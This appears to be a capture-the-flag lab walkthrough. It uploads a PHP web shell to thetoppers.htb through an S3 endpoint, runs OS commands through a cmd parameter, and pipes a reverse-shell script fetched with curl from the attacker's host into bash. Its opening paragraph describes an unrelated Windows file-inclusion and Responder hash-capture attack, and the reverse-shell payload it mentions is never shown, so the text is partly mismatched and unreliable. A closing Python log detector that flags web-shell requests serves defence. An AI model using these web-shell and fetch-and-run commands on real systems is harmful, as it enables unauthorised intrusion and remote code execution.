HOME LAB : HANDS-ON
By taking advantage of a File Inclusion vulnerability present on a webpage hosted on a Windows machine, an attacker can collect the NetNTLMv2 hash used for authentication services implemented through technologies such as NTLM (New Technology LAN Manager) and Kerberos. The attacker can then utilize a tool called "Responder" to capture the NetNTLMv2 hash, which can subsequently be subjected to brute-force attacks using "John the Ripper" in an attempt to match the original password used to create the hash.
aws --endpoint=http://s3.thetoppers.htb s3 cp shell.php s3://thetoppers.htb
upload: ./shell.php to s3://thetoppers.htb/shell.php
We can confirm that our shell is uploaded by navigating to http://thetoppers.htb/shell.php. Let us try executing the OS command id using the URL parameter cmd.
http://thetoppers.htb/shell.php?cmd=id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Let's get a reverse shell by creating a new file shell.sh containing the following bash reverse shell payload, which will connect back to our local machine on port 1337.
We will start an ncat listener on our local port 1337 using the following command.
nc -nvlp 1337
Let's start a web server on our local machine on port 8000.
python3 -m http.server 8000
We can use the curl utility to fetch the bash reverse shell file from our local host and then pipe it to bash
in order to execute it. Thus, let us visit the following URL containing the payload in the browser.
http://thetoppers.htb/shell.php?cmd=curl%2010.10.15.203:8000/shell.sh|bash
The flag can be found at /var/www/flag.txt.
cat /var/www/flag.txt
Another way to get the flag:
http://thetoppers.htb/shell.php?cmd=id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
http://thetoppers.htb/shell.php?cmd=ls
http://thetoppers.htb/shell.php?cmd=ls+
images index.php shell.php
http://thetoppers.htb/shell.php?cmd=ls+..
flag.txt html
http://thetoppers.htb/shell.php?cmd=cat+../flag.txt
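The requests used in this walkthrough leave a recognisable trail in the web server's access log. The following is an added example, not part of the original post: a heuristic detector that decodes each query parameter and scores it for shell-like content. The log lines are constructed, and the command list, parameter names and threshold are assumptions to tune per site.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Request line of an Apache/nginx "combined" access-log entry.
REQ = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) [^"]*"')
# Heuristic lists: assumptions for this example, tune them per site.
COMMANDS = {"id", "ls", "cat", "whoami", "uname", "curl", "wget", "bash", "sh", "nc"}
SHELL_PARAMS = {"cmd", "c", "exec", "command"}
METACHARS = re.compile(r"[|;`]|\$\(")

def score_value(name, value):
    """Score one decoded query parameter; higher means more shell-like."""
    tokens = value.split()
    score = 0
    if tokens and tokens[0] in COMMANDS:
        score += 1                      # value starts with an OS command name
    if name.lower() in SHELL_PARAMS:
        score += 1                      # parameter name typical of web shells
    if METACHARS.search(value):
        score += 2                      # pipe, chaining or command substitution
    if "../" in value or ".." in tokens:
        score += 1                      # argument walks out of the web root
    return score

def find_webshell_requests(lines, threshold=2):
    """Return (client_ip, path, param, decoded_value, score) for suspicious hits."""
    hits = []
    for line in lines:
        m = REQ.match(line)
        url = urlsplit(m.group(2)) if m else None
        if url is None or not url.path.endswith(".php"):
            continue                    # not a request entry, or not a PHP script
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            s = score_value(name, value)
            if s >= threshold:
                hits.append((m.group(1), url.path, name, value, s))
    return hits

# Constructed sample log lines modelled on the requests in this walkthrough.
SAMPLE = [
    '10.10.15.203 - - [01/Jan/2024:10:00:01 +0000] "GET /shell.php?cmd=id HTTP/1.1" 200 54 "-" "Mozilla/5.0"',
    '10.10.15.203 - - [01/Jan/2024:10:00:09 +0000] "GET /shell.php?cmd=curl%2010.10.15.203:8000/shell.sh|bash HTTP/1.1" 200 0 "-" "Mozilla/5.0"',
    '10.10.15.203 - - [01/Jan/2024:10:00:20 +0000] "GET /shell.php?cmd=cat+../flag.txt HTTP/1.1" 200 33 "-" "Mozilla/5.0"',
    '192.0.2.7 - - [01/Jan/2024:10:01:00 +0000] "GET /search.php?q=cat+pictures HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '192.0.2.7 - - [01/Jan/2024:10:01:05 +0000] "GET /index.php HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    print(*find_webshell_requests(SAMPLE), sep="\n")
```

The benign search for "cat pictures" scores 1 and stays below the threshold, while every request to shell.php is reported with its decoded command.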